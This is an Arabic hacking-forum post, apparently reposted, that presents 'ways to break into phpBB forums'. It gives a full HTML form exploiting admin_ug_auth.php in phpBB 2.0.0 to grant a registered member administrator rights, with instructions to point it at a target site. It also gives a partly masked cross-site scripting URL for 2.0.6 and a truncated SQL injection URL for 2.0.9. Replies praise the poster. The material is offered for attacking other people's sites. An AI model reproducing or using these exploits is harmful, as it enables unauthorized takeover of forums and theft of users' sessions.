السلام عليكم ورحمة الله وبركاته منقول ثغرة phpbb بجميع انواعها بعـــض طرق اختـــراق منتدى phpbb ثغرة خطيرة من منتدى من نوع PhpBB2 في ملف admin_ug_auth.php الوصف: يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى وبذلك يمكنك الدخول الى لوحة التحكم متى شئت الأصدار: 2.0.0 لتجربة الثغرة اولا سجل بالمنتدى ثم احفظ رقم عضويتك بالمنتدى بعدها افتح المفكرة وانسخ مايلي اليها كود PHP: <html> <head> </head> ******> <form method="post" action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"> User Level: <select name="userlevel"> <option value="admin">Administrator</option> <option value="user">User</option></select> <input type="hidden" name="private[1]" value="0"> <input type="hidden" name="moderator[1]" value="0"> <input type="hidden" name="mode" value="user"> <input type="hidden" name="adv" value=""> User Number: <input type="text" name="u" size="5"> <input type="submit" name="submit" value="Submit"> </form> </body> </html> عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory اخفظه بامتدادhtml عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى أضغط زر submit بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك :::::::: ثغره فى الاصدار Powered by phpBB 2.0.6 كل ما عليك تطبق الكود كود PHP: http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe********>********.write(********.******);</s cript>&category_rows[0][cat_order]=99 ثغره فى الاصدار Powered by phpBB 2.0.9 كل ما عليك هو تطبق هذا الكود كود PHP: http://www.xxxxx.com/privmsg.php?fo...20LIMI T%201 تقبلوا تحياتى
التعديل الأخير تم بواسطة فلاش الليل ; 12-06-2010 الساعة 04:28 PM
هكر الجنوب
تسلم والله والله انك مو هكر الجنوب هكر مجنون
شكرااااااا جزيلالالالالالا على الشرح الرائع
قوانين المنتدى